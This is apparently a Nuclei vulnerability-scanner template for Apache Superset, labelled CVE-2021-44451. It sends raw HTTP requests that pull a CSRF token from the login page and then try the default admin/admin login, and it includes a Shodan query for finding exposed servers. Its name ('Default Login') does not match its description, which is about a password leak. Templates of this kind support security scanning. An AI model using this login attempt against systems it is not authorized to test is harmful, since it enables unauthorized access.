id: CVE-2021-44451 info: name: Apache Superset Default Login author: dhiyaneshDK severity: medium description: Apache Superset up to and including 1.3.2 allowed for registered database connections password leak for authenticated users. This information could be accessed in a non-trivial way. reference: - https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/apache-superset-default-credentials.json - https://nvd.nist.gov/vuln/detail/CVE-2021-44451 - https://lists.apache.org/thread/xww1pccs2ckb5506wrf1v4lmxg198vkb remediation: Users should upgrade to Apache Superset 1.4.0 or higher. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N cvss-score: 6.5 cve-id: CVE-2021-44451 cwe-id: CWE-522 metadata: verified: true shodan-query: http.favicon.hash:1582430156 tags: cve,cve2021,apache,superset,default-login requests: - raw: - | GET /login/ HTTP/1.1 Host: {{Hostname}} Origin: {{BaseURL}} - | POST /login/ HTTP/1.1 Host: {{Hostname}} Origin: {{BaseURL}} Content-Type: application/x-www-form-urlencoded Referer: {{BaseURL}}/admin/airflow/login csrf_token={{csrf_token}}&username={{username}}&password={{password}} attack: pitchfork payloads: username: - admin password: - admin extractors: - type: regex name: csrf_token group: 1 part: body internal: true regex: - 'value="(.*?)">' matchers-condition: and matchers: - type: word part: body condition: and words: - 'Redirecting...' - '

Redirecting...' - type: word part: header words: - 'session' - type: status status: - 302 # Enhanced by mp on 2022/03/02